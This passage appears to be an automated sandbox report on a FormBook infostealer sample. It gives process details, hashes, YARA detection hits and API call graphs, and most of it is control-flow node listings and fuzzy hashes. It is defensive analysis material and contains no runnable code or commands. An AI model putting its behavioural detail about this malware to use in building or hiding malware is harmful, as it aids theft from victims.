                                                            MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:9
                                                            Start time:16:05:15
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe"
                                                            Imagebase:0x8f0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:12
                                                            Start time:16:05:27
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff6de060000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:80
                                                              Total number of Limit Nodes:6
                                                              execution_graph 23700 ea4668 23701 ea4672 23700->23701 23705 ea4758 23700->23705 23710 ea3e1c 23701->23710 23703 ea468d 23706 ea477d 23705->23706 23716 ea4868 23706->23716 23720 ea4858 23706->23720 23711 ea3e27 23710->23711 23728 ea5c60 23711->23728 23713 ea6f9a 23732 ea5c70 23713->23732 23715 ea6fac 23715->23703 23717 ea488f 23716->23717 23719 ea496c 23717->23719 23724 ea449c 23717->23724 23721 ea488f 23720->23721 23722 ea449c CreateActCtxA 23721->23722 23723 ea496c 23721->23723 23722->23723 23725 ea58f8 CreateActCtxA 23724->23725 23727 ea59bb 23725->23727 23727->23727 23729 ea5c6b 23728->23729 23730 ea5c70 GetModuleHandleW 23729->23730 23731 ea7050 23730->23731 23731->23713 23733 ea5c7b 23732->23733 23736 ea5cc8 23733->23736 23735 ea7175 23735->23715 23737 ea5cd3 23736->23737 23740 ea5cf8 23737->23740 23739 ea725a 23739->23735 23741 ea5d03 23740->23741 23744 ea5d28 23741->23744 23743 ea734d 23743->23739 23745 ea5d33 23744->23745 23747 ea864b 23745->23747 23750 eaacf3 23745->23750 23746 ea8689 23746->23743 23747->23746 23754 eacde0 23747->23754 23759 eaad28 23750->23759 23762 eaad18 23750->23762 23751 eaad06 23751->23747 23755 eace11 23754->23755 23756 eace35 23755->23756 23771 ead0c0 23755->23771 23775 ead0b1 23755->23775 23756->23746 23766 eab209 23759->23766 23760 eaad37 23760->23751 23763 eaad28 23762->23763 23765 eab209 GetModuleHandleW 23763->23765 23764 eaad37 23764->23751 23765->23764 23767 eab25c 23766->23767 23768 eab239 23766->23768 23767->23760 23768->23767 23769 eab460 GetModuleHandleW 23768->23769 23770 eab48d 23769->23770 23770->23760 23773 ead0cd 23771->23773 23772 ead107 23772->23756 23773->23772 23779 eab140 23773->23779 23777 ead0cd 23775->23777 23776 ead107 23776->23756 23777->23776 23778 eab140 GetModuleHandleW 23777->23778 23778->23776 23780 eab14b 23779->23780 23782 eade20 23780->23782 23783 ead46c 23780->23783 23784 ead477 23783->23784 23785 ea5d28 GetModuleHandleW 23784->23785 23786 eade8f 23785->23786 23786->23782 23787 ead828 DuplicateHandle 23788 ead8be 23787->23788 23793 ead1d8 23794 ead21e GetCurrentProcess 23793->23794 23796 ead270 GetCurrentThread 23794->23796 23799 ead269 23794->23799 23797 ead2ad GetCurrentProcess 23796->23797 23798 ead2a6 23796->23798 23800 ead2e3 23797->23800 23798->23797 23799->23796 23801 ead30b GetCurrentThreadId 23800->23801 23802 ead33c 23801->23802 23789 737b470 23790 737b471 VirtualProtect 23789->23790 23792 737b4f2 23790->23792

                                                              Executed Functions

                                                              Function 07374250 Relevance: 4.0, Strings: 3, Instructions: 293COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 7374250-7374258 339 737429a-73742a7 338->339 340 737425a-737426c 338->340 342 73742a8-73742b0 339->342 341 737426e-737428c 340->341 340->342 341->339 343 73742b2-73742d8 342->343 344 73742f1-7374313 342->344 343->344 345 7374315 344->345 346 737431a-7374374 344->346 345->346 349 7374377 346->349 350 737437e-737439a 349->350 351 73743a3-73743a4 350->351 352 737439c 350->352 353 7374550-73745c0 351->353 354 73743a9-73743d1 351->354 352->349 352->353 352->354 355 73744f3-737450e 352->355 356 73743d3-73743e5 352->356 357 7374513-737452a 352->357 358 737443c-7374466 352->358 359 73743e7-73743ef call 7374ba0 352->359 360 73744a6-73744bb 352->360 361 73744c0-73744ee 352->361 362 737452f-737454b 352->362 363 737440c-7374410 352->363 364 737446b-73744a1 352->364 380 73745c2 call 73760e2 353->380 381 73745c2 call 73758ab 353->381 382 73745c2 call 73755d9 353->382 354->350 355->350 356->350 357->350 358->350 372 73743f5-7374407 359->372 360->350 361->350 362->350 365 7374423-737442a 363->365 366 7374412-7374421 363->366 364->350 373 7374431-7374437 365->373 366->373 372->350 373->350 379 73745c8-73745d2 380->379 381->379 382->379
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: 9aec49664320de091ee962ee2edd421b54d9a517f118e75ffe6afd59ff22de34
                                                              • Instruction ID: f24dfec4a40fd33e04359b77940bfc2dc18c45c45dd63cbada9b6a991ae80d69
                                                              • Opcode Fuzzy Hash: 9aec49664320de091ee962ee2edd421b54d9a517f118e75ffe6afd59ff22de34
                                                              • Instruction Fuzzy Hash: 8AB168B5E002598FEB14CFE9D9809DEFBB2BF89310F24912AD419BB254D7349941CF94
                                                              Function 073742DF Relevance: 4.0, Strings: 3, Instructions: 223COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 384 73742df-73742e1 385 73742e3-7374313 384->385 386 737435f-7374369 384->386 392 7374315 385->392 393 737431a-7374369 385->393 387 7374371-7374374 386->387 389 7374377 387->389 391 737437e-737439a 389->391 394 73743a3-73743a4 391->394 395 737439c 391->395 392->393 393->387 396 7374550-73745c0 394->396 397 73743a9-73743d1 394->397 395->389 395->396 395->397 398 73744f3-737450e 395->398 399 73743d3-73743e5 395->399 400 7374513-737452a 395->400 401 737443c-7374466 395->401 402 73743e7-73743ef call 7374ba0 395->402 403 73744a6-73744bb 395->403 404 73744c0-73744ee 395->404 405 737452f-737454b 395->405 406 737440c-7374410 395->406 407 737446b-73744a1 395->407 424 73745c2 call 73760e2 396->424 425 73745c2 call 73758ab 396->425 426 73745c2 call 73755d9 396->426 397->391 398->391 399->391 400->391 401->391 416 73743f5-7374407 402->416 403->391 404->391 405->391 409 7374423-737442a 406->409 410 7374412-7374421 406->410 407->391 417 7374431-7374437 409->417 410->417 416->391 417->391 423 73745c8-73745d2 424->423 425->423 426->423
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: c70323fb3df670ad53af9b9cc31d38f7e5fcc7d0e9333b2eacfe73ddb6bd10e2
                                                              • Instruction ID: 7d0249716a4c25cf90260c234e08b7b1e3907e81cba135bf08ee1c85f36822ef
                                                              • Opcode Fuzzy Hash: c70323fb3df670ad53af9b9cc31d38f7e5fcc7d0e9333b2eacfe73ddb6bd10e2
                                                              • Instruction Fuzzy Hash: 1291F4B4E102198FDB08CFEAC98559EFBB6FF89300F24952AD419BB264D735A901CF54
                                                              Function 073742F0 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 428 73742f0-7374313 430 7374315 428->430 431 737431a-7374374 428->431 430->431 434 7374377 431->434 435 737437e-737439a 434->435 436 73743a3-73743a4 435->436 437 737439c 435->437 438 7374550-73745c0 436->438 439 73743a9-73743d1 436->439 437->434 437->438 437->439 440 73744f3-737450e 437->440 441 73743d3-73743e5 437->441 442 7374513-737452a 437->442 443 737443c-7374466 437->443 444 73743e7-73743ef call 7374ba0 437->444 445 73744a6-73744bb 437->445 446 73744c0-73744ee 437->446 447 737452f-737454b 437->447 448 737440c-7374410 437->448 449 737446b-73744a1 437->449 465 73745c2 call 73760e2 438->465 466 73745c2 call 73758ab 438->466 467 73745c2 call 73755d9 438->467 439->435 440->435 441->435 442->435 443->435 457 73743f5-7374407 444->457 445->435 446->435 447->435 450 7374423-737442a 448->450 451 7374412-7374421 448->451 449->435 458 7374431-7374437 450->458 451->458 457->435 458->435 464 73745c8-73745d2 465->464 466->464 467->464
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Teeq$Teeq$z^I
                                                              • API String ID: 0-3834019116
                                                              • Opcode ID: 3776cd6d091dee022ba00e7aae15579efa066147acbd45c5a0aef1fc125215cb
                                                              • Instruction ID: 9b6ccc1ade8d7117d7a06d8f3109f1896fef120fa51d15697a7054dd83caaaf4
                                                              • Opcode Fuzzy Hash: 3776cd6d091dee022ba00e7aae15579efa066147acbd45c5a0aef1fc125215cb
                                                              • Instruction Fuzzy Hash: 7691F4B4E102198FDB08CFEAC58559EFBB6FF89300F24912AD419BB264D735A901CF54
                                                              Function 0737633A Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 491 737633a-7376346 493 7376398-73763a0 491->493 494 7376348-737634a 491->494 495 7376402-7376418 493->495 496 73763a2-73763c0 493->496 494->493 498 7376419-737643d 495->498 497 73763c2-73763dc 496->497 496->498 499 737643f-737647d 497->499 500 73763de-7376400 497->500 498->499 504 7376484-73764c2 call 7376a00 499->504 505 737647f 499->505 500->495 507 73764c8 504->507 505->504 508 73764cf-73764eb 507->508 509 73764f4-73764f5 508->509 510 73764ed 508->510 529 737684b-7376852 509->529 510->507 510->509 511 73766d3-73766e8 510->511 512 7376570-7376588 510->512 513 737671d-7376721 510->513 514 73765dd-73765fb 510->514 515 737653b-7376544 510->515 516 73767db-73767e1 510->516 517 73764fa-73764fe 510->517 518 73766a7-73766bc 510->518 519 7376527-7376539 510->519 520 7376666-7376686 510->520 521 73765c6-73765d8 510->521 522 7376805-7376811 510->522 523 73766c1-73766ce 510->523 524 7376600-737660c 510->524 525 737664f-7376661 510->525 526 737682f-7376846 510->526 527 73766ed-73766f1 510->527 528 737674d-7376759 510->528 510->529 530 737668b-73766a2 510->530 531 737662a-737664a 510->531 511->508 538 737658f 512->538 539 737658a 512->539 544 7376734-737673b 513->544 545 7376723-7376732 513->545 514->508 536 7376557-737655e 515->536 537 7376546-7376555 515->537 553 73767e9-7376800 516->553 534 7376511-7376518 517->534 535 7376500-737650f 517->535 518->508 519->508 520->508 521->508 540 7376813 522->540 541 7376818-737682a 522->541 523->508 532 7376613-7376625 524->532 533 737660e 524->533 525->508 526->508 542 7376704-737670b 527->542 543 73766f3-7376702 527->543 546 7376760-7376776 528->546 547 737675b 528->547 530->508 531->508 532->508 533->532 550 737651f-7376525 534->550 535->550 552 7376565-737656b 536->552 537->552 558 7376599-73765a5 538->558 539->538 540->541 541->508 554 7376712-7376718 542->554 543->554 555 7376742-7376748 544->555 545->555 560 737677d-7376793 546->560 561 7376778 546->561 547->546 550->508 552->508 553->508 554->508 555->508 562 73765a7 558->562 563 73765ac-73765c1 558->563 566 7376795 560->566 567 737679a-73767b0 560->567 561->560 562->563 563->508 566->567 569 73767b7-73767d6 567->569 570 73767b2 567->570 569->508 570->569
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 963e961b760ddf099faeef7b1a8cae6fb8f33643d2e5f59d7e73c48a20bc5f85
                                                              • Instruction ID: d58a3877037def955b8e4432f4ef356eb3915633553a6687f04944838e3ef0a5
                                                              • Opcode Fuzzy Hash: 963e961b760ddf099faeef7b1a8cae6fb8f33643d2e5f59d7e73c48a20bc5f85
                                                              • Instruction Fuzzy Hash: 38E1AEB1D1461ADFDB14CFA5D4928EEFBB6FF49310B14C566D409AB215C338AA82CF90
                                                              Function 07376391 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 573 7376391-7376394 574 73763f6-7376400 573->574 575 7376396-73763a0 573->575 577 7376402-7376418 574->577 575->577 579 73763a2-73763c0 575->579 578 7376419-737643d 577->578 581 737643f-737647d 578->581 579->578 580 73763c2-73763dc 579->580 580->581 582 73763de-73763f5 580->582 585 7376484-73764c2 call 7376a00 581->585 586 737647f 581->586 582->574 588 73764c8 585->588 586->585 589 73764cf-73764eb 588->589 590 73764f4-73764f5 589->590 591 73764ed 589->591 610 737684b-7376852 590->610 591->588 591->590 592 73766d3-73766e8 591->592 593 7376570-7376588 591->593 594 737671d-7376721 591->594 595 73765dd-73765fb 591->595 596 737653b-7376544 591->596 597 73767db-73767e1 591->597 598 73764fa-73764fe 591->598 599 73766a7-73766bc 591->599 600 7376527-7376539 591->600 601 7376666-7376686 591->601 602 73765c6-73765d8 591->602 603 7376805-7376811 591->603 604 73766c1-73766ce 591->604 605 7376600-737660c 591->605 606 737664f-7376661 591->606 607 737682f-7376846 591->607 608 73766ed-73766f1 591->608 609 737674d-7376759 591->609 591->610 611 737668b-73766a2 591->611 612 737662a-737664a 591->612 592->589 619 737658f 593->619 620 737658a 593->620 625 7376734-737673b 594->625 626 7376723-7376732 594->626 595->589 617 7376557-737655e 596->617 618 7376546-7376555 596->618 634 73767e9-7376800 597->634 615 7376511-7376518 598->615 616 7376500-737650f 598->616 599->589 600->589 601->589 602->589 621 7376813 603->621 622 7376818-737682a 603->622 604->589 613 7376613-7376625 605->613 614 737660e 605->614 606->589 607->589 623 7376704-737670b 608->623 624 73766f3-7376702 608->624 627 7376760-7376776 609->627 628 737675b 609->628 611->589 612->589 613->589 614->613 631 737651f-7376525 615->631 616->631 633 7376565-737656b 617->633 618->633 639 7376599-73765a5 619->639 620->619 621->622 622->589 635 7376712-7376718 623->635 624->635 636 7376742-7376748 625->636 626->636 641 737677d-7376793 627->641 642 7376778 627->642 628->627 631->589 633->589 634->589 635->589 636->589 643 73765a7 639->643 644 73765ac-73765c1 639->644 647 7376795 641->647 648 737679a-73767b0 641->648 642->641 643->644 644->589 647->648 650 73767b7-73767d6 648->650 651 73767b2 648->651 650->589 651->650
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 1d661a9326bd3a35f6a496c06c06d4c11f25c41958e18d502a28f08c9659b0c4
                                                              • Instruction ID: 0a216c7ad0d54eb3badff40a7801593cefea947d92aade8b5bcb65c91ee87f0b
                                                              • Opcode Fuzzy Hash: 1d661a9326bd3a35f6a496c06c06d4c11f25c41958e18d502a28f08c9659b0c4
                                                              • Instruction Fuzzy Hash: DFE1AEB1D1461ADFDB14CFA5D4928EEFBB6FF49310B148566D409AB215C338AA82CF90
                                                              Function 07376371 Relevance: 2.9, Strings: 2, Instructions: 360COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 654 7376371-7376388 655 73763ec-737647d 654->655 656 737638a-737638f 654->656 662 7376484-73764c2 call 7376a00 655->662 663 737647f 655->663 656->655 665 73764c8 662->665 663->662 666 73764cf-73764eb 665->666 667 73764f4-73764f5 666->667 668 73764ed 666->668 687 737684b-7376852 667->687 668->665 668->667 669 73766d3-73766e8 668->669 670 7376570-7376588 668->670 671 737671d-7376721 668->671 672 73765dd-73765fb 668->672 673 737653b-7376544 668->673 674 73767db-73767e1 668->674 675 73764fa-73764fe 668->675 676 73766a7-73766bc 668->676 677 7376527-7376539 668->677 678 7376666-7376686 668->678 679 73765c6-73765d8 668->679 680 7376805-7376811 668->680 681 73766c1-73766ce 668->681 682 7376600-737660c 668->682 683 737664f-7376661 668->683 684 737682f-7376846 668->684 685 73766ed-73766f1 668->685 686 737674d-7376759 668->686 668->687 688 737668b-73766a2 668->688 689 737662a-737664a 668->689 669->666 696 737658f 670->696 697 737658a 670->697 702 7376734-737673b 671->702 703 7376723-7376732 671->703 672->666 694 7376557-737655e 673->694 695 7376546-7376555 673->695 711 73767e9-7376800 674->711 692 7376511-7376518 675->692 693 7376500-737650f 675->693 676->666 677->666 678->666 679->666 698 7376813 680->698 699 7376818-737682a 680->699 681->666 690 7376613-7376625 682->690 691 737660e 682->691 683->666 684->666 700 7376704-737670b 685->700 701 73766f3-7376702 685->701 704 7376760-7376776 686->704 705 737675b 686->705 688->666 689->666 690->666 691->690 708 737651f-7376525 692->708 693->708 710 7376565-737656b 694->710 695->710 716 7376599-73765a5 696->716 697->696 698->699 699->666 712 7376712-7376718 700->712 701->712 713 7376742-7376748 702->713 703->713 718 737677d-7376793 704->718 719 7376778 704->719 705->704 708->666 710->666 711->666 712->666 713->666 720 73765a7 716->720 721 73765ac-73765c1 716->721 724 7376795 718->724 725 737679a-73767b0 718->725 719->718 720->721 721->666 724->725 727 73767b7-73767d6 725->727 728 73767b2 725->728 727->666 728->727
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 03d366e892b64aad87df1f6c232dda9a6a974aa91660044b650ad7f0366531be
                                                              • Instruction ID: 2ce9f72b23e22dee879387dbf916bec9d584ed409417893a5b9a7c7aaa9233c5
                                                              • Opcode Fuzzy Hash: 03d366e892b64aad87df1f6c232dda9a6a974aa91660044b650ad7f0366531be
                                                              • Instruction Fuzzy Hash: 0AE17AB0D1461ADFDB14CFA5D4928EEFBB6FF49310F148566D409AB215C338AA82CF90
                                                              Function 07376458 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 731 7376458-737647d 732 7376484-73764c2 call 7376a00 731->732 733 737647f 731->733 735 73764c8 732->735 733->732 736 73764cf-73764eb 735->736 737 73764f4-73764f5 736->737 738 73764ed 736->738 757 737684b-7376852 737->757 738->735 738->737 739 73766d3-73766e8 738->739 740 7376570-7376588 738->740 741 737671d-7376721 738->741 742 73765dd-73765fb 738->742 743 737653b-7376544 738->743 744 73767db-73767e1 738->744 745 73764fa-73764fe 738->745 746 73766a7-73766bc 738->746 747 7376527-7376539 738->747 748 7376666-7376686 738->748 749 73765c6-73765d8 738->749 750 7376805-7376811 738->750 751 73766c1-73766ce 738->751 752 7376600-737660c 738->752 753 737664f-7376661 738->753 754 737682f-7376846 738->754 755 73766ed-73766f1 738->755 756 737674d-7376759 738->756 738->757 758 737668b-73766a2 738->758 759 737662a-737664a 738->759 739->736 766 737658f 740->766 767 737658a 740->767 772 7376734-737673b 741->772 773 7376723-7376732 741->773 742->736 764 7376557-737655e 743->764 765 7376546-7376555 743->765 781 73767e9-7376800 744->781 762 7376511-7376518 745->762 763 7376500-737650f 745->763 746->736 747->736 748->736 749->736 768 7376813 750->768 769 7376818-737682a 750->769 751->736 760 7376613-7376625 752->760 761 737660e 752->761 753->736 754->736 770 7376704-737670b 755->770 771 73766f3-7376702 755->771 774 7376760-7376776 756->774 775 737675b 756->775 758->736 759->736 760->736 761->760 778 737651f-7376525 762->778 763->778 780 7376565-737656b 764->780 765->780 786 7376599-73765a5 766->786 767->766 768->769 769->736 782 7376712-7376718 770->782 771->782 783 7376742-7376748 772->783 773->783 788 737677d-7376793 774->788 789 7376778 774->789 775->774 778->736 780->736 781->736 782->736 783->736 790 73765a7 786->790 791 73765ac-73765c1 786->791 794 7376795 788->794 795 737679a-73767b0 788->795 789->788 790->791 791->736 794->795 797 73767b7-73767d6 795->797 798 73767b2 795->798 797->736 798->797
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ry$ry
                                                              • API String ID: 0-883804406
                                                              • Opcode ID: 83fc443fa7b3e290b08adb1b16ba40e4cb87162b2072b82de0fec90f7819cd7e
                                                              • Instruction ID: 7be40a72b94a39fb3b6438c368257aaea478c8160b06ef83fbbb5ff0d34eff30
                                                              • Opcode Fuzzy Hash: 83fc443fa7b3e290b08adb1b16ba40e4cb87162b2072b82de0fec90f7819cd7e
                                                              • Instruction Fuzzy Hash: 0CC139B0D1461ADFDB14CFA5C4A68AEFBB6FF89300F14C559D509AB214C738AA42CF94
                                                              Function 0737D280 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 801 737d280-737d2a5 802 737d2a7 801->802 803 737d2ac-737d2dd 801->803 802->803 804 737d2de 803->804 805 737d2e5-737d301 804->805 806 737d303 805->806 807 737d30a-737d30b 805->807 806->804 808 737d577-737d580 806->808 809 737d310-737d341 806->809 810 737d4b7-737d4ca 806->810 811 737d4f6-737d50e 806->811 812 737d414-737d418 806->812 813 737d354-737d367 806->813 814 737d513-737d525 806->814 815 737d47d-737d486 806->815 816 737d55d-737d572 806->816 817 737d3fc-737d40f 806->817 818 737d398-737d3aa 806->818 819 737d463-737d478 806->819 820 737d541-737d558 806->820 821 737d3e0-737d3f7 806->821 822 737d3af-737d3b2 806->822 823 737d36c-737d393 806->823 824 737d48b-737d4b2 806->824 825 737d44b-737d45e 806->825 826 737d52a-737d53c 806->826 807->808 807->809 838 737d344 call 737d8f0 809->838 839 737d344 call 737d8e0 809->839 827 737d4dd-737d4e4 810->827 828 737d4cc-737d4db 810->828 811->805 829 737d42b-737d432 812->829 830 737d41a-737d429 812->830 813->805 814->805 815->805 816->805 817->805 818->805 819->805 820->805 821->805 840 737d3b5 call 737d6d2 822->840 841 737d3b5 call 737b5ac 822->841 823->805 824->805 825->805 826->805 834 737d4eb-737d4f1 827->834 828->834 831 737d439-737d446 829->831 830->831 831->805 834->805 835 737d3bb-737d3db 835->805 837 737d34a-737d352 837->805 838->837 839->837 840->835 841->835
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TuA$UC;"
                                                              • API String ID: 0-2071649361
                                                              • Opcode ID: fe6570ec40fb3f7e73fe66603475dd7056558f42dfc09da518f0bb714b2ca798
                                                              • Instruction ID: c7f93aaf893c7350ea5a140403d2493a436e54eadfac91aadeedb9f56be14187
                                                              • Opcode Fuzzy Hash: fe6570ec40fb3f7e73fe66603475dd7056558f42dfc09da518f0bb714b2ca798
                                                              • Instruction Fuzzy Hash: 2B9115B1E2420DEFDB18CFE6E58559EFBB6EF89310F10942AE419A7264DB349542CF04
                                                              Function 0737D270 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 842 737d270-737d2a5 843 737d2a7 842->843 844 737d2ac-737d2dd 842->844 843->844 845 737d2de 844->845 846 737d2e5-737d301 845->846 847 737d303 846->847 848 737d30a-737d30b 846->848 847->845 849 737d577-737d580 847->849 850 737d310-737d341 847->850 851 737d4b7-737d4ca 847->851 852 737d4f6-737d50e 847->852 853 737d414-737d418 847->853 854 737d354-737d367 847->854 855 737d513-737d525 847->855 856 737d47d-737d486 847->856 857 737d55d-737d572 847->857 858 737d3fc-737d40f 847->858 859 737d398-737d3aa 847->859 860 737d463-737d478 847->860 861 737d541-737d558 847->861 862 737d3e0-737d3f7 847->862 863 737d3af-737d3b2 847->863 864 737d36c-737d393 847->864 865 737d48b-737d4b2 847->865 866 737d44b-737d45e 847->866 867 737d52a-737d53c 847->867 848->849 848->850 879 737d344 call 737d8f0 850->879 880 737d344 call 737d8e0 850->880 868 737d4dd-737d4e4 851->868 869 737d4cc-737d4db 851->869 852->846 870 737d42b-737d432 853->870 871 737d41a-737d429 853->871 854->846 855->846 856->846 857->846 858->846 859->846 860->846 861->846 862->846 881 737d3b5 call 737d6d2 863->881 882 737d3b5 call 737b5ac 863->882 864->846 865->846 866->846 867->846 875 737d4eb-737d4f1 868->875 869->875 872 737d439-737d446 870->872 871->872 872->846 875->846 876 737d3bb-737d3db 876->846 878 737d34a-737d352 878->846 879->878 880->878 881->876 882->876
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TuA$UC;"
                                                              • API String ID: 0-2071649361
                                                              • Opcode ID: 0dd4c6e1a415629d76cbc1386310e05ad2e15e7043ed4b318e8941e47a9b9f9a
                                                              • Instruction ID: 60ce5627c7500be77837e71e124545c5e83c0d090cf14895023f5e6becb65fcf
                                                              • Opcode Fuzzy Hash: 0dd4c6e1a415629d76cbc1386310e05ad2e15e7043ed4b318e8941e47a9b9f9a
                                                              • Instruction Fuzzy Hash: 1C9115B1E2420DEFDB18CFA6E58559EFBB6EF89310F10942AE419A7264D7349942CF04
                                                              Function 0737BC48 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5=6
                                                              • API String ID: 0-2897083178
                                                              • Opcode ID: 2af09a683b995a5eb53edb3e9da3390b9a97a9418e1cc0c53ae28d0140c6dbca
                                                              • Instruction ID: 7aea64870be50346dd3c8ff46b4399f4ce43f06b508a7d1ed470a8aeec2ed1bb
